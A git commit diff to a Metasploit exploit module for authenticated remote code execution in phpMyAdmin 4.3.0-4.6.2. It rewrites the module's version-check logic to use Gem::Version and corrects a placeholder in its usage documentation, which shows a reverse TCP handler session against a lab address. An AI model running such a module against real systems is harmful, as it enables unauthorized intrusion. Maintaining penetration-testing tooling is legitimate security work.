Use Gem::Version

Simplify version comparisons
2018-06-18 08:35:47 -05:00 · 2018-06-18 08:35:47 -05:00 · 2e2ded22fc
parent 122ea2ddcb
commit 2e2ded22fc
2 changed files with 11 additions and 14 deletions
--- a/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md
+++ b/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md
@ -41,7 +41,7 @@ msf5 > use exploit/multi/http/phpmyadmin_null_termination_exec
 msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set rhost 172.22.222.122
 rhost => 172.22.222.122
 msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set database <database>
-database => <bugtracker>
+database => <database>
 msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > run

 [*] Started reverse TCP handler on 172.22.222.177:4444 
--- a/modules/exploits/multi/http/phpmyadmin_null_termination_exec.rb
+++ b/modules/exploits/multi/http/phpmyadmin_null_termination_exec.rb
@ -75,12 +75,10 @@ class MetasploitModule < Msf::Exploit::Remote
    if php_version
      vprint_status("#{peer} - PHP version: #{php_version}")

-      if php_version =~ /PHP\/(\d)\.(\d)\.(\d)/
-        if $1.to_i > 5
-          return Exploit::CheckCode::Safe
-        elsif $1.to_i == 5 && $2.to_i > 4
-          return Exploit::CheckCode::Safe
-        elsif $1.to_i == 5 && $2.to_i == 4 && $3.to_i > 6
+      if php_version =~ /PHP\/(\d+\.\d+\.\d+)/
+        version = Gem::Version.new($1)
+        vprint_status("#{peer} - PHP version: #{version.to_s}")
+        if version > Gem::Version.new('5.4.6')
          return Exploit::CheckCode::Safe
        end
      end
@ -89,14 +87,13 @@ class MetasploitModule < Msf::Exploit::Remote
    end

    # 4.3.0 - 4.6.2 authorized user RCE exploit
-    if res.body =~ /pmaversion = '(\d)\.(\d)\.(.*)';/
-      vprint_status("#{peer} - phpMyAdmin version: #{$1}.#{$2}.#{$3}")
+    if res.body =~ /pmaversion = '(\d+\.\d+\.\d+)';/
+      version = Gem::Version.new($1)
+      vprint_status("#{peer} - phpMyAdmin version: #{version.to_s}")

-      if $1.to_i == 4 && $2.to_i > 2 && $2.to_i < 7
-        unless $2.to_i == 6 && $3.to_i > 2
+      if version >= Gem::Version.new('4.3.0') and version <= Gem::Version.new('4.6.2')
        return Exploit::CheckCode::Appears
-        end
-      elsif $1.to_i < 4
+      elsif version < Gem::Version.new('4.3.0')
        return Exploit::CheckCode::Detected
      end
      return Exploit::CheckCode::Safe